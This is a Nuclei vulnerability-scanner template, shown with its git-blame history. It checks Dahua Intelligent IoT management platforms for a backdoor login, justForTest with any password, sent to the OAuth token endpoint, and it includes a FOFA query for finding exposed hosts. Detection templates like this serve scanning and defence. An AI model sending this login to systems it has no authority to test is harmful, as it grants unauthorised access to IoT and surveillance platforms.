nuclei-templates/http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml

id: dahua-icc-backdoor-user

info:
  name: Dahua Intelligent IoT - Information Disclosure
  author: DhiyaneshDk
  severity: high
  description: |
    There is a vulnerability in the user login interface /evo-apigw/evo-oauth/oauth/token of Zhejiang Dahua Technology Co., Ltd. Intelligent IoT Integrated Management Platform. Users can successfully log in to the platform using justForTest/any password, causing information leakage.
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-1935899595"body="*客户端会小于800*"
  tags: dahua,exposure,backdoor,bypass

http:
  - raw:
      - |
        POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":'
          - '"access_token":'
          - '"token_type":'
          - 'magicId'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'
# digest: 4a0a0047304502202f66ac6a8c54de587e6e21482a082175a7931ae59dfa8ac2e63bf405ddcfe870022100a19620245a5e1eb6c6390359e3735bfff8a966f72dd07da246133ccf02ce03e5:922c64590222798bb761d5b6d8e72950
Create dahua-icc-backdoor-user.yaml 2023-12-26 06:46:55 +00:00			`id: dahua-icc-backdoor-user`

			`info:`
Update dahua-icc-backdoor-user.yaml 2023-12-30 14:32:27 +00:00			`name: Dahua Intelligent IoT - Information Disclosure`
Create dahua-icc-backdoor-user.yaml 2023-12-26 06:46:55 +00:00			`author: DhiyaneshDk`
			`severity: high`
			`description: \|`
			`There is a vulnerability in the user login interface /evo-apigw/evo-oauth/oauth/token of Zhejiang Dahua Technology Co., Ltd. Intelligent IoT Integrated Management Platform. Users can successfully log in to the platform using justForTest/any password, causing information leakage.`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`fofa-query: icon_hash="-1935899595"body="客户端会小于800"`
Update dahua-icc-backdoor-user.yaml 2023-12-30 14:32:27 +00:00			`tags: dahua,exposure,backdoor,bypass`
Create dahua-icc-backdoor-user.yaml 2023-12-26 06:46:55 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '"success":'`
			`- '"access_token":'`
			`- '"token_type":'`
Update dahua-icc-backdoor-user.yaml 2023-12-30 14:32:27 +00:00			`- 'magicId'`
Create dahua-icc-backdoor-user.yaml 2023-12-26 06:46:55 +00:00			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- 'application/json'`
Auto Template Signing [Sat Dec 30 14:50:29 UTC 2023] :robot: 2023-12-30 14:50:29 +00:00			`# digest: 4a0a0047304502202f66ac6a8c54de587e6e21482a082175a7931ae59dfa8ac2e63bf405ddcfe870022100a19620245a5e1eb6c6390359e3735bfff8a966f72dd07da246133ccf02ce03e5:922c64590222798bb761d5b6d8e72950`